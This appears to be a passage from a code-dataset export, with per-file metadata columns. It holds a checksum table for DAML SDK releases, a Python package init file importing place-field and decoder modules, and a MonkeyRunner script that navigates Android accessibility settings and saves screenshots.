"daml_react": "3dabcccd1d4c13637cc096c401606f777f90368a4057dc7220269f8101aa1888",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.2.0": {
"linux": "3920012a013d2b162f1328addaaf6c8f322f0473c1f681146fa748039f838a77",
"macos": "2f0e39f864b288de7a8b55996916452c3226669054423ee921660eb3a3467b9f",
"windows": "0df31d5dda5a23ad48c0201135c0611881bdc49d7f5ecbf31fce24d2129e9626",
"test_tool": "7c41476ec2fff62b0b588f07cd7496b5fde8fcdb440a48d539041ac3df7141d6",
"daml_types": "339591a0213d33d55f73fc10f33edd8e7f3d1f6a7b560a0abddb5510e5fe9c26",
"daml_ledger": "873452dce84fab87b456b1da1d9d5bc2a74cf4c6f3c6872e409a1b4c3dd170f1",
"daml_react": "bb58c2c51befe75f7f50a4ccf90bd9ed2593cdfff6ac1c9a98e0a80f5dbf82f7",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.3.0": {
"linux": "556975da1fa4ac2f4c44825a1518f4ee01e6ba2de3f6dcc70ec24f9d13f2689a",
"macos": "43cb5b1c98115e1ddb7a4fe5ab629a2090cbbf177a5715d533dca76824552f9d",
"windows": "a2318e6b95a718028b65d1e84ee6aadcd1252ae78e0fce335ac2f0a903051eee",
"test_tool": "5fe64257452bece53d88fcb4d9dbe4f472f7f7e12c4a571ac39796ce47e8527f",
"daml_types": "41cdc3d0a9448869470054d3d9d0ea71c40309893e94474074369d1709a65676",
"daml_ledger": "acd6499ea37c5cfe069a9461dd1ab425293df166eed8085ee913e80e9a188510",
"daml_react": "a192c3b51faacaf95efc250442f7c6be4ae5ad227cf07f661f49c06548302b67",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.4.0": {
"linux": "28883d87c6b6780e6d13ef88ed4b6131135b2293520c2da143094744c112646f",
"macos": "2be95a05a6c7f67de1cc1cfa605d6d518c32b63c9893dfaa2558d3e9a7dfc70b",
"windows": "f8449378fb572f93ba4c3ef7716e69f5ddbdc60a9b7b1a4aeab2a867954bcac4",
"test_tool": "04aa064be948a9a1e88456c9fe0eaafe9d1e6280930039a5570b61df42c00129",
"daml_types": "cc47d4576c85eac5840c8733bd702304c282bb656603a6c621ea701d106e9ede",
"daml_ledger": "f112eac6597a0787008cf995894ab9bbe8e5f0e39a699e22f02c36080d88b12d",
"daml_react": "d7e50c4d94424e3f25df716105d00c4eb945f2709282a548ae93f250e306fc9c",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.5.0": {
"linux": "a9f92e5e773c8984e1ccf305dc96e254a1c73a1427626e3fd315066d6f4545e4",
"macos": "0e8e571d2a50c4e0a305e2c98c510a2b2272583a0c0bc48df7050b7196e827de",
"windows": "2eec0144ffedbdad069dfc49187daf72e94f12b2d27b66443b63d6244967dedd",
"test_tool": "539260ae20afbcc67f50e359a31a4a7f808d0b5fec6417b8cd6c73eefba4b13c",
"daml_types": "389fdf6aa51c7610986327cf2e9e02fe7bb91a5845692b4db32c73c67355f5d5",
"daml_ledger": "6fb560a8a482b6ddef30eef66e1e55e964fd7b9749ac5e9eceb3a98c51722d1d",
"daml_react": "2d7572e009fa10b1ca430e28a9d18cd60b6299ecb75f4a000967fb1322c2edb2",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.6.0-snapshot.20200908.5166.0.1623baec": {
"linux": "9ef0dadc4f0a73a67a5f232e3b772621cc2a0bdfb52d0d7526d54918d2a84623",
"macos": "94e12f7a44a4d54ecd8e468c12bd4fdeb0c50d964cbfe5ab4d22a712ff8b50f7",
"windows": "cb4455fb9aca17a72981204f221fc7fb3b50deab3979713dd42197173c6b98e5",
"test_tool": "ec69bd4d936e05d847ccfbbf8f09904365eea05c77a9cf3787245942a0cb71be",
"daml_types": "0f8fe04ca10befd8e00db9fb2c4c3bb934c26104f66f662815a7a065bb51d533",
"daml_ledger": "ec96ac50a665758b3ab029e4500888375ac05cc52aca5b2b1465821c0b3ee4bd",
"daml_react": "5a09dbb578c3e3307e51d776ce226dcb702ea8268267e360b080501c81313844",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.6.0-snapshot.20200915.5208.0.09014dc6": {
"linux": "e9c14e30ce8c637d8c5759b1b8af4b53ff1318b9cc01bf5bbb48d60c4c50db46",
"macos": "bd1e38d798b64a16390fc242c7e67ddf1610e493f360afd97e31fe50377a940f",
"windows": "d7d3ba4e66cad4ac8a9204a459a854b529631595242a000128c13068d71b4b78",
"test_tool": "f416d8feb765a55d63109e7e6c81038cc5ea1216a8f0662fb6cbb25cf274f087",
"daml_types": "dcb127364c91ac8797d3c6fc852d9e87f11213abbe60317570b7644c586e6fac",
"daml_ledger": "649d191c758eb947324fe40f20df18ba2305abe5133be4c90e97834701691405",
"daml_react": "2e4080f2160daf2c86308a90c24077394f4893383145910ea0fdd6bb7afea891",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
}
| 56.861538
| 100
| 0.77151
| 387
| 7,392
| 14.573643
| 0.330749
| 0.006383
| 0.005319
| 0.02234
| 0.153014
| 0.138475
| 0.07961
| 0.07961
| 0.072163
| 0.039184
| 0
| 0.489378
| 0.133929
| 7,392
| 129
| 101
| 57.302326
| 0.391596
| 0.032197
| 0
| 0.28
| 1
| 0
| 0.774094
| 0.679955
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bec2a13b68868423b30d4224bd6f231aeb978464
| 193
|
py
|
Python
|
spiketag/analysis/__init__.py
|
chongxi/spiketag
|
d27bc9553936c5f9c8a5b71dedcf701987a5b77b
|
[
"BSD-3-Clause"
] | 4
|
2018-04-23T18:08:39.000Z
|
2020-03-10T19:06:28.000Z
|
spiketag/analysis/__init__.py
|
chongxi/spiketag
|
d27bc9553936c5f9c8a5b71dedcf701987a5b77b
|
[
"BSD-3-Clause"
] | 69
|
2017-02-17T19:27:52.000Z
|
2022-03-30T04:06:53.000Z
|
spiketag/analysis/__init__.py
|
chongxi/spiketag
|
d27bc9553936c5f9c8a5b71dedcf701987a5b77b
|
[
"BSD-3-Clause"
] | 5
|
2017-02-01T16:11:32.000Z
|
2021-02-05T20:10:43.000Z
|
from .place_field import place_field
from .place_field import info_bits, info_sparcity
from .core import *
from .decoder import Decoder, NaiveBayes, load_decoder
from .core import spike_binning
| 38.6
| 54
| 0.839378
| 29
| 193
| 5.344828
| 0.448276
| 0.193548
| 0.180645
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11399
| 193
| 5
| 55
| 38.6
| 0.906433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fe62ddfa5f0ed189462c015e81d130ef5ff3fe42
| 2,657
|
py
|
Python
|
code/turn-on-access-service.py
|
fogies/docker-android-accessibility-capture
|
f07f675325dbeedbea4d3ef824f0558b61b29738
|
[
"Apache-2.0"
] | null | null | null |
code/turn-on-access-service.py
|
fogies/docker-android-accessibility-capture
|
f07f675325dbeedbea4d3ef824f0558b61b29738
|
[
"Apache-2.0"
] | null | null | null |
code/turn-on-access-service.py
|
fogies/docker-android-accessibility-capture
|
f07f675325dbeedbea4d3ef824f0558b61b29738
|
[
"Apache-2.0"
] | null | null | null |
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
#import com.android.provider.Settings
import time, sys
device = MonkeyRunner.waitForConnection()
count=1
logsdir=sys.argv[1]
runComponent='com.android.settings/.Settings'
device.startActivity(component=runComponent)
time.sleep(6)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_DPAD_DOWN', MonkeyDevice.DOWN_AND_UP)
time.sleep(6)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_DPAD_DOWN', MonkeyDevice.DOWN_AND_UP)
time.sleep(6)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_ENTER', MonkeyDevice.DOWN_AND_UP)
time.sleep(10)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_TAB', MonkeyDevice.DOWN_AND_UP)
time.sleep(6)
device.press('KEYCODE_TAB', MonkeyDevice.DOWN_AND_UP)
time.sleep(6)
device.press('KEYCODE_ENTER', MonkeyDevice.DOWN_AND_UP)
time.sleep(15)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_TAB', MonkeyDevice.DOWN_AND_UP)
time.sleep(6)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_TAB', MonkeyDevice.DOWN_AND_UP)
time.sleep(6)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
device.press('KEYCODE_ENTER', MonkeyDevice.DOWN_AND_UP)
time.sleep(10)
screenShot = device.takeSnapshot()
print "writing to : ./"+logsdir+"/accessSettings/"+str(count)+"Screen.png"
screenShot.writeToFile('./'+logsdir+'/accessSettings/'+str(count)+'AccessScreen.png','png')
count=count+1
| 42.854839
| 91
| 0.765149
| 329
| 2,657
| 6.091185
| 0.12766
| 0.167665
| 0.191617
| 0.231537
| 0.881737
| 0.881737
| 0.881737
| 0.881737
| 0.881737
| 0.881737
| 0
| 0.009091
| 0.047798
| 2,657
| 62
| 92
| 42.854839
| 0.783004
| 0.013549
| 0
| 0.862069
| 0
| 0
| 0.294163
| 0.011446
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.034483
| null | null | 0.137931
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.